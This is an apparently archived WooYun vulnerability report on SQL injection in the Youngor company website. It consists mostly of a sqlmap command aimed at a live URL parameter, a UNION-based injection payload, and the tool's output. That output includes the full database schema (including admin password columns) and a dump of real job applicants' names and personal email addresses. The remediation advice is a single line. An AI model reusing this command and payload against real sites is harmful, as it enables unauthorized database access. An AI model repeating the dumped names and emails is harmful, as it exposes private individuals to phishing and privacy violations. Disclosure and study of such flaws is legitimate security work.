漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-084899
漏洞标题:中国雅戈尔官网存在SQL注入
相关厂商:中国雅戈尔
漏洞作者: piza_M
提交时间:2014-11-28 15:28
修复时间:2015-01-12 15:30
公开时间:2015-01-12 15:30
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-12: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中国雅戈尔官网存在SQL注入
详细说明:
[root@Hacker~]# Sqlmap -u http://www.youngor.com/comment.do?artid=20130301012636
7100 --current-user --current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:10:12
[09:10:13] [INFO] resuming back-end DBMS 'mysql'
[09:10:14] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: artid
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: artid=201303010126367100' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NU
LL, CONCAT(0x3a6d6c643a,0x664d6758645741717274,0x3a7962683a), NULL, NULL, NULL,
NULL, NULL#
---
[09:10:14] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5
[09:10:14] [INFO] fetching current user
current user: 'websiteDB@localhost'
[09:10:14] [INFO] fetching current database
current database: 'websiteDB'
部分库单:
Database: websiteDB
[25 tables]
+---------------------------------------+
| hr_admin |
| hr_article |
| hr_channel |
| hr_class |
| hr_cmmword |
| hr_comment |
| hr_count |
| hr_ctcache |
| hr_files |
| hr_jobs |
| hr_jobset |
| hr_keyword |
| hr_log |
| hr_log_1 |
| hr_message |
| hr_offer |
| hr_resume |
| hr_system |
| hr_units |
| hr_user |
| sub_article |
| sub_class |
| sub_gbk |
| sub_order |
| sub_web |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
部分表单列表:
Database: websiteDB
Table: hr_units
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| GroupArr | varchar(10) |
| ID | varchar(20) |
| LinkUrl | varchar(200) |
| UnitName | varchar(40) |
+----------+--------------+
Database: websiteDB
Table: hr_cmmword
[3 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| ID | varchar(20) |
| Keyword | varchar(100) |
| Note | varchar(400) |
+---------+--------------+
Database: websiteDB
Table: hr_log
[4 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| ClassID | varchar(20) |
| ID | varchar(20) |
| Operating | int(2) |
| UpdateTime | date |
+------------+-------------+
Database: websiteDB
Table: hr_count
[5 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| ClassName | varchar(100) |
| ID | varchar(20) |
| IPAddr | varchar(20) |
| UrlPath | varchar(200) |
| VisitTime | datetime |
+-----------+--------------+
Database: websiteDB
Table: hr_class
[22 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| ChannelID | varchar(20) |
| Child | int(11) |
| ClassName | varchar(50) |
| ClassPicUrl | varchar(40) |
| Depth | int(11) |
| Hits | int(11) |
| ID | varchar(20) |
| IsPass | int(2) |
| IsSingle | int(2) |
| Items | varchar(200) |
| LinkUrl | varchar(200) |
| Meta_Description | text |
| Meta_Keywords | varchar(200) |
| NextID | varchar(20) |
| OpenType | int(2) |
| OrderID | int(11) |
| ParentID | varchar(20) |
| ParentPath | varchar(300) |
| PrevID | varchar(20) |
| Readme | text |
| Tips | varchar(200) |
| UpdateTime | datetime |
+------------------+--------------+
Database: websiteDB
Table: hr_resume
[30 columns]
+------------+---------------+
| Column | Type |
+------------+---------------+
| Address | varchar(100) |
| BirthDay | varchar(20) |
| City | varchar(80) |
| Contact | varchar(100) |
| Contactype | varchar(40) |
| Country | varchar(100) |
| EduBg | varchar(1000) |
| Email | varchar(80) |
| Family | varchar(1000) |
| ID | varchar(20) |
| IDnum | varchar(40) |
| IDtype | varchar(80) |
| Job | varchar(20) |
| JobState | int(2) |
| LanguageBg | varchar(1000) |
| Marryed | varchar(10) |
| Overseas | int(2) |
| Polity | varchar(80) |
| PostNum | varchar(40) |
| Province | varchar(80) |
| Salary | varchar(80) |
| SelfIntro | varchar(1000) |
| Sex | varchar(10) |
| SmallPhoto | varchar(50) |
| Updatetime | datetime |
| UserID | varchar(20) |
| UsrName | varchar(50) |
| WorkExper | varchar(1000) |
| WorkPlace | varchar(80) |
| Workyears | varchar(10) |
+------------+---------------+
Database: websiteDB
Table: sub_order
[15 columns]
+------------+---------------+
| Column | Type |
+------------+---------------+
| Address | varchar(200) |
| Company | varchar(200) |
| Email | varchar(80) |
| Fax | varchar(80) |
| GuestName | varchar(40) |
| ID | varchar(20) |
| IP | varchar(20) |
| Language | varchar(4) |
| Note | varchar(1000) |
| Pathstr | varchar(200) |
| PC | varchar(200) |
| Products | varchar(200) |
| SiteID | varchar(20) |
| Tel | varchar(80) |
| Updatetime | datetime |
+------------+---------------+
Database: websiteDB
Table: hr_article
[24 columns]
+----------------+---------------+
| Column | Type |
+----------------+---------------+
| Author | varchar(40) |
| ClassID | varchar(20) |
| Content | text |
| CopyFrom | varchar(200) |
| Editor | varchar(40) |
| Files | varchar(100) |
| Hits | int(11) |
| ID | varchar(20) |
| Inputer | varchar(40) |
| Intro | varchar(5000) |
| IsDel | int(2) |
| IsElite | int(2) |
| IsTop | int(2) |
| Keyword | varchar(200) |
| LinkUrl | varchar(200) |
| OrderID | int(11) |
| SmallPhoto | varchar(50) |
| Status | int(2) |
| Subheading | varchar(200) |
| Title | varchar(200) |
| TitleFontColor | varchar(7) |
| TitleFontType | varchar(20) |
| TitleShort | varchar(40) |
| UpdateTime | datetime |
+----------------+---------------+
Database: websiteDB
Table: hr_files
[9 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| ChannelID | varchar(20) |
| FileDir | varchar(100) |
| FileNameLocal | varchar(200) |
| FileNameRemote | varchar(20) |
| FileSize | int(11) |
| FileType | varchar(10) |
| ID | varchar(20) |
| InfoID | varchar(20) |
| UpdateTime | datetime |
+----------------+--------------+
Database: websiteDB
Table: hr_ctcache
[6 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| ClassID | varchar(20) |
| ClassName | varchar(40) |
| Ct_add | int(11) |
| Ct_artile | int(11) |
| Ct_edit | int(11) |
| Ct_view | int(11) |
+-----------+-------------+
Database: websiteDB
Table: hr_jobs
[17 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| Company | varchar(80) |
| CompanyType | varchar(20) |
| Contact | varchar(1000) |
| Duty | varchar(1000) |
| Education | varchar(20) |
| ID | varchar(20) |
| IsPass | int(2) |
| IsTJ | int(2) |
| JobRequire | varchar(1000) |
| Jobs | varchar(80) |
| JobsNum | int(11) |
| Jobstype | varchar(20) |
| OrderID | int(11) |
| SiteID | varchar(20) |
| UpdateTime | datetime |
| Workplace | varchar(80) |
| Workyears | varchar(20) |
+-------------+---------------+
Database: websiteDB
Table: hr_message
[14 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| Address | varchar(200) |
| City | varchar(80) |
| Country | varchar(80) |
| Email | varchar(80) |
| ID | varchar(20) |
| IP | varchar(20) |
| IsPass | int(2) |
| IsRead | int(2) |
| IsReply | int(2) |
| Message | text |
| Name | varchar(40) |
| Postcode | varchar(40) |
| Telphone | varchar(80) |
| UpdateTime | datetime |
+------------+--------------+
Database: websiteDB
Table: hr_keyword
[5 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| ID | varchar(20) |
| KeyWords | varchar(40) |
| Linkurl | varchar(400) |
| Num | int(11) |
| Updatetime | datetime |
+------------+--------------+
Database: websiteDB
Table: hr_system
[15 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| CopyRight | varchar(300) |
| FileSize | int(11) |
| FileType | varchar(200) |
| GetAdmin | varchar(32) |
| ID | int(11) |
| IsYear | int(2) |
| Meta_Description | varchar(300) |
| Meta_Keywords | varchar(1000) |
| PicSize | int(11) |
| PicType | varchar(200) |
| ReturnNum | int(11) |
| Siteadm | varchar(30) |
| SiteEmail | varchar(200) |
| SiteName | varchar(200) |
| SiteUrl | varchar(200) |
+------------------+---------------+
Database: websiteDB
Table: sub_class
[25 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| AdminUrl | varchar(200) |
| ChannelID | varchar(25) |
| Child | int(11) |
| ClassName | varchar(50) |
| ClassPicUrl | varchar(80) |
| DefultPic | varchar(50) |
| Depth | int(11) |
| ID | varchar(25) |
| IsNav | int(2) |
| IsPass | int(2) |
| IsSingle | varchar(20) |
| Items | varchar(200) |
| Language | varchar(4) |
| LinkUrl | varchar(200) |
| Meta_Description | text |
| Meta_Keywords | varchar(200) |
| NextID | varchar(25) |
| OpenType | int(2) |
| OrderID | int(11) |
| ParentID | varchar(25) |
| ParentPath | varchar(300) |
| PrevID | varchar(25) |
| Readme | text |
| Tips | varchar(200) |
| UpdateTime | datetime |
+------------------+--------------+
Database: websiteDB
Table: hr_offer
[12 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| Gmail | varchar(80) |
| Gname | varchar(40) |
| Gsex | varchar(2) |
| ID | varchar(20) |
| IsRead | int(2) |
| IsReply | int(2) |
| JobID | varchar(20) |
| Jobname | varchar(100) |
| Jobtype | varchar(2) |
| ResumeID | varchar(20) |
| UpdateTime | datetime |
| UserID | varchar(20) |
+------------+--------------+
Database: websiteDB
Table: hr_admin
[12 columns]
+------------------+-------------+
| Column | Type |
+------------------+-------------+
| AdminName | varchar(50) |
| Email | varchar(80) |
| EnableMultiLogin | int(2) |
| ID | varchar(20) |
| IsPass | int(2) |
| LastLoginIP | varchar(20) |
| LastLoginTime | datetime |
| LoginTimes | int(11) |
| Password | varchar(50) |
| Powerarr | text |
| Purview | int(2) |
| RegTime | datetime |
+------------------+-------------+
Database: websiteDB
Table: hr_comment
[10 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| COMMENT_ID | bigint(20) |
| CONTENT | text |
| CREATE_TIME | datetime |
| IP | varchar(20) |
| IS_CHECK | tinyint(4) |
| IS_DISABLED | tinyint(4) |
| IS_RECOMMEND | tinyint(4) |
| MEMBER | varchar(50) |
| REF_DOC_ID | varchar(20) |
| WEBSITE_ID | bigint(20) |
+--------------+-------------+
Database: websiteDB
Table: sub_article
[24 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| Author | varchar(40) |
| ClassID | varchar(25) |
| Content | text |
| CopyFrom | varchar(200) |
| Editor | varchar(40) |
| Files | varchar(100) |
| Hits | int(11) |
| ID | varchar(20) |
| Inputer | varchar(40) |
| Intro | varchar(400) |
| IsDel | int(2) |
| IsElite | int(2) |
| IsTop | int(2) |
| Keyword | varchar(200) |
| LinkUrl | varchar(200) |
| OrderID | int(11) |
| SmallPhoto | varchar(80) |
| Status | int(2) |
| Subheading | varchar(200) |
| Title | varchar(200) |
| TitleFontColor | varchar(7) |
| TitleFontType | varchar(20) |
| TitleShort | varchar(40) |
| UpdateTime | datetime |
+----------------+--------------+
Database: websiteDB
Table: hr_jobset
[14 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| BirthYear | varchar(200) |
| City | varchar(400) |
| Contact | varchar(200) |
| Country | varchar(400) |
| Education | varchar(200) |
| IDtype | varchar(200) |
| Job | varchar(200) |
| Jobstype | varchar(200) |
| JobYear | varchar(200) |
| Langauge | varchar(400) |
| Marryed | varchar(200) |
| Polity | varchar(200) |
| Province | varchar(400) |
| Workyears | varchar(200) |
+-----------+--------------+
Database: websiteDB
Table: sub_gbk
[11 columns]
+------------+---------------+
| Column | Type |
+------------+---------------+
| Address | varchar(200) |
| Email | varchar(80) |
| Fax | varchar(80) |
| GuestName | varchar(40) |
| ID | varchar(20) |
| IPaddr | varchar(20) |
| Language | varchar(4) |
| Note | varchar(1000) |
| SiteID | varchar(20) |
| Tel | varchar(80) |
| Updatetime | datetime |
+------------+---------------+
Database: websiteDB
Table: hr_log_1
[5 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| id | bigint(20) unsigned |
| loginName | varchar(50) |
| logip | varchar(50) |
| opshow | text |
| optime | varchar(50) |
+-----------+---------------------+
Database: websiteDB
Table: hr_channel
[15 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| ChannelName | varchar(50) |
| ChannelType | int(2) |
| Child | int(11) |
| Depth | int(11) |
| ID | varchar(20) |
| IsPass | int(2) |
| LinkUrl | varchar(200) |
| NextID | varchar(20) |
| OpenType | int(2) |
| OrderID | int(11) |
| ParentID | varchar(20) |
| ParentPath | varchar(300) |
| PrevID | varchar(20) |
| ReadMe | varchar(200) |
| UnitID | varchar(20) |
+-------------+--------------+
Database: websiteDB
Table: hr_user
[7 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| Email | varchar(80) |
| ID | varchar(20) |
| IP | varchar(20) |
| IsPass | int(2) |
| Password | varchar(40) |
| UpdateTime | datetime |
| UserName | varchar(32) |
+------------+-------------+
Database: websiteDB
Table: sub_web
[18 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| AdmEmail | varchar(80) |
| AdmId | varchar(50) |
| AdmName | varchar(50) |
| AdmPwd | varchar(50) |
| cJapan | varchar(2) |
| CopyRight | varchar(300) |
| ID | varchar(20) |
| IndexLogo | varchar(100) |
| IsPass | int(2) |
| Logo | varchar(100) |
| Meta_Description | varchar(300) |
| Meta_Keywords | varchar(1000) |
| OrderID | int(11) |
| SubName | varchar(200) |
| SubUrl | varchar(200) |
| TopLogo | varchar(100) |
| TopLogoEn | varchar(100) |
| UpdateTime | datetime |
+------------------+---------------+
hr_offer部分表单明细:
200811120146026619,杜俊杰,djj@hongru.com
200902130657017789,梅梁梅,liangcool1986@163.com
200902140954017813,王斌斌,310158142@qq.com
200902160316518653,陈栋蕾,silen2005@126.com
200902170245308713,戴丹丹,daidandanegg@163.com
200902170443242564,柳乐安,liuleanlawyer@yahoo.com.cn
200902191006122240,赵华威,happy86022177@qq.com
200901181003211866,Kevin Chang,kchang0614@gmail.com
200902200128325630,伍胜男,shengnanwu@126.com
200902191108352943,张越己,fudanyjzhang@126.com
200902191108352943,张越己,fudanyjzhang@126.com
200902201054231850,殷白露,ybl186@qq.com
200902200128325630,伍胜男,shengnanwu@126.com
200902220839541000,关世杰,guanshijie@126.com
200902240342003700,李欣,lixine1000@126.com
200902241107348458,张晶晶,zjj861209@126.com
200902241107348458,张晶晶,zjj861209@126.com
200902250845101000,王晓峰,lanyanxiaowang@163.com
200902260912539145,范子敬,zijing.raeuber@gmail.com
200902261215045000,潘师节,Sabrina0714@163.com
200902270458334672,邹豹,jxzb_2007@126.com
200902271001190000,叶科,yeke1116@163.com
200902280951004800,吴庆海,11wuqinghai@163.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903021245222717,杨蕊,abbyyoung.job@gmail.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903050141353615,张蓓,zhangbei23s@126.com
200903050413089849,马亮,ml0552@126.com
200903050449367493,喻丽红,yulihong19861102@126.com
200903050449367493,喻丽红,yulihong19861102@126.com
200903070638388538,董 力銘,donglm@hotmail.co.jp
200903100929019247,陈荣,steve_chen1026@163.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903120851025754,何 伟,dvdhewei@gmail.com
200903131112240000,闫兵兵,bingbin7916@sina.com
200903150131161887,李威,wilighy@sina.com
200903160824257618,邹助茜,zouzoushi@163.com
200903160909148000,潘康垒,pkl1209@163.com
200903161050586000,马欢,colin1101@sina.com
200903170725480000,张益东,zyd716@126.com
200902240342003700,李欣,lixine1000@126.com
200903170725480000,张益东,zyd716@126.com
200903110138107757,许瀚文,hongxiu1023@163.com
200903220736441100,宓开芳,517657608@qq.com
200903221121268894,张国锋,michael_zhang_2006@hotmail.com
200903221121268894,张国锋,michael_zhang_2006@hotmail.com
200902211134078828,高帅,fuyaosheri@sina.com
200903240338392275,何媛,qingfengpu_c@163.com
200903240338392275,何媛,qingfengpu_c@163.com
200903290114300000,秦波,173845871@163.com
200903290818414193,张欣,xinxin86@live.cim
200903301022099451,罗明,luom_22@163.com
200902011232092349,何媛,heyuan1232522@163.com
漏洞证明:
已经证明
修复方案:
过滤参数
版权声明:转载请注明来源 piza_M@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝